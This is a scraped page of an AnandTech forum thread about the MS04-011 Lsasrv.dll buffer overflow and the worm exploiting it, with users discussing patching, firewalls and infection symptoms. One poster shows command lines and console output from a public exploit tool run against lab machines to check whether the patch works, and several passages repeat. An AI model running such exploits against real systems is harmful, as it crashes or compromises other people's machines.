-
We’re currently investigating an issue related to the forum theme and styling that is impacting page layout and visual formatting. The problem has been identified, and we are actively working on a resolution. There is no impact to user data or functionality, this is strictly a front-end display issue. We’ll post an update once the fix has been deployed. Thanks for your patience while we get this sorted.
Lsasrv.dll RPC buffer overflow remote exploit
Page 2 - Seeking answers? Join the AnandTech community: where nearly half-a-million members share solutions and discuss the latest tech.
NogginBoink
Diamond Member
I have Microsoft folk doing the same thing. Will report back when I have more info.
FreshPrince
Diamond Member
which tcp/udp ports does this hack travel on?
Luckily I haven't got caught with this, although I don't have the patch installed. My g/f was lucky enough to get it though and she's on Purdue's network. I just called in to the office to see if they're having any problems. I put in two systems that should prevent anything from happening so I just hope they work.
NogginBoink
Diamond Member
I've also been told that machines that have been patched with MS04-011 are not vulnerable to this attack.
NogginBoink
Diamond Member
AFTER you're infected, yes. Of course.
If you'd patched before slammer or blaster came out you would never have been affected. In those cases, it was about a month between patch and exploit. This time, it's about two weeks. The witty worm was out less than a full day after the patch came out.
Moral: patch your boxes. You no longer have the luxury of waiting for others to test the waters for you.
Exploit run on Win2k machine with MS04-011 patch:
C:\lsass.exe 1 192.168.1.5 4444 -t
MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---
[*] Target: IP: 192.168.1.5: OS: Win2k Professional [universal] netrap.dll
[*] Connecting to 192.168.1.5:445 ...
[-] Sorry, cannot connect to 192.168.1.5:445. Try again...
Exploit run on WinXP machine without patch:
C:\lsass.exe 1 192.168.1.6 4444 -t
MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---
[*] Target: IP: 192.168.1.6: OS: WinXP Professional [universal] lsass.exe
[*] Connecting to 192.168.1.6:445 ... OK
[*] Detecting remote OS: Windows 5.1
If it's run without the "-t" option, it'll respond with "Attacking ... OK" instead, crash the LSA Shell and initiate Windows 30 second shutdown. Open a command prompt and run "shutdown -a" to terminate the countdown.
EDIT: typos
EDIT2: I'm getting weird results with the exploit. I patched the WinXP machine and still get the same response. I also ran the exploit locally on the Win2k machine (on 127.0.0.1) and it responded with "Attacking ... OK". Anyone have more definite answers?
EDIT3: Okay, hopefully I got it figured out. The last line (Detecting... or Attacking... ) doesn't indicate the success of the exploit, because it will show the same results whether the system is patched or not. So, I just ran the exploit from a Win98 and Win2k machine against a WinXP machine and successfully crashed LSA Shell. After I patched the WinXP machine, the exploit couldn't crash it (even though the third line remained the same). In conclusion, the patch works. But we knew this by now anyway... :-/
C:\lsass.exe 1 192.168.1.5 4444 -t
MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---
[*] Target: IP: 192.168.1.5: OS: Win2k Professional [universal] netrap.dll
[*] Connecting to 192.168.1.5:445 ...
[-] Sorry, cannot connect to 192.168.1.5:445. Try again...
Exploit run on WinXP machine without patch:
C:\lsass.exe 1 192.168.1.6 4444 -t
MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---
[*] Target: IP: 192.168.1.6: OS: WinXP Professional [universal] lsass.exe
[*] Connecting to 192.168.1.6:445 ... OK
[*] Detecting remote OS: Windows 5.1
If it's run without the "-t" option, it'll respond with "Attacking ... OK" instead, crash the LSA Shell and initiate Windows 30 second shutdown. Open a command prompt and run "shutdown -a" to terminate the countdown.
EDIT: typos
EDIT2: I'm getting weird results with the exploit. I patched the WinXP machine and still get the same response. I also ran the exploit locally on the Win2k machine (on 127.0.0.1) and it responded with "Attacking ... OK". Anyone have more definite answers?
EDIT3: Okay, hopefully I got it figured out. The last line (Detecting... or Attacking... ) doesn't indicate the success of the exploit, because it will show the same results whether the system is patched or not. So, I just ran the exploit from a Win98 and Win2k machine against a WinXP machine and successfully crashed LSA Shell. After I patched the WinXP machine, the exploit couldn't crash it (even though the third line remained the same). In conclusion, the patch works. But we knew this by now anyway... :-/
I'll reiterate what I said when MSBlaster (both variants) & SQL Slammer were the headlines:
Anyone who has a windows box with NetBIOS or Samba ports internet accessible is an idiot. It's called a firewall people. Not one of these things would get through a simple NAT router like the one you would use to share cable/DSL on more than one computer in the default configuration. Holes in Windows on the NetBIOS & Samba ports are not new; this is the 4th time a hole on these specific ports has been patched in the past year. We were using the NetBIOS bugs to crash Windows 3.1 boxes in high school circa 1990.
These modern "virii" require stupidity to spread. Notable exception being corporate LANs that get infected by laptops operated by idiots who take them out of hibernate there.
If a hardware firewall isn't available (because for example, you use your laptop on the road), every software firewall will block these things in the default configuration as well. (except maybe the one built into WinXP)
Firewalls and common sense is far superior virus protection to any patches and/or "anti-virus" software. Unfortunately common sense is a misnomer because it is not common.
Anyone who has a windows box with NetBIOS or Samba ports internet accessible is an idiot. It's called a firewall people. Not one of these things would get through a simple NAT router like the one you would use to share cable/DSL on more than one computer in the default configuration. Holes in Windows on the NetBIOS & Samba ports are not new; this is the 4th time a hole on these specific ports has been patched in the past year. We were using the NetBIOS bugs to crash Windows 3.1 boxes in high school circa 1990.
These modern "virii" require stupidity to spread. Notable exception being corporate LANs that get infected by laptops operated by idiots who take them out of hibernate there.
If a hardware firewall isn't available (because for example, you use your laptop on the road), every software firewall will block these things in the default configuration as well. (except maybe the one built into WinXP)
Firewalls and common sense is far superior virus protection to any patches and/or "anti-virus" software. Unfortunately common sense is a misnomer because it is not common.
I'm seeing the effects of the worm tonight. It appears it removes many of Windows features. I have seen it disable the run command, remove all icons from the control panel, removes the selection to shut down a computer and only gives the option to Log Out and also in some cases removes the option to use port 80. Of course the RPC shutdows are there also.
The calls are really starting to pick up on this tonight.
The calls are really starting to pick up on this tonight.
FreshPrince
Diamond Member
relying solely on firewalls to block this virus is silly....there are may ways that this virus can get in. One very simple way I can think of is email. If an unsuspecting user opens up an email containing this virus, and you don't block those netbios ports from within your LAN(which many corporate windows users won't, otherwise windows will be useless). Then the virus will spread like wildfire in your LAN. This is what virus writers count on..people's stupidity. They know the virus won't go through firewalls, but they also know people are stupid 🙂
ultimatebob
Lifer
Sadly, this is true. I'm on both the Microsoft and Red Hat Linux security mailing lists, and lately I've been receiving more security patch notifications from Red Hat than I have from Microsoft. Sure, I usually don't have to reboot my Red Hat boxes for the patches to take effect like I do on the Microsoft boxes, but it's still a pain to have to patch these systems once a week.
TRENDING THREADS
-
Discussion Zen 5 Speculation (EPYC Turin and Strix Point/Granite Ridge - Ryzen 9000)- Started by DisEnchantment
- Replies: 25K
-
Discussion Intel Meteor, Arrow, Lunar & Panther Lakes + WCL Discussion Threads
- Started by Tigerick
- Replies: 25K
-
Discussion Intel current and future Lakes & Rapids thread- Started by TheF34RChannel
- Replies: 24K
-
-
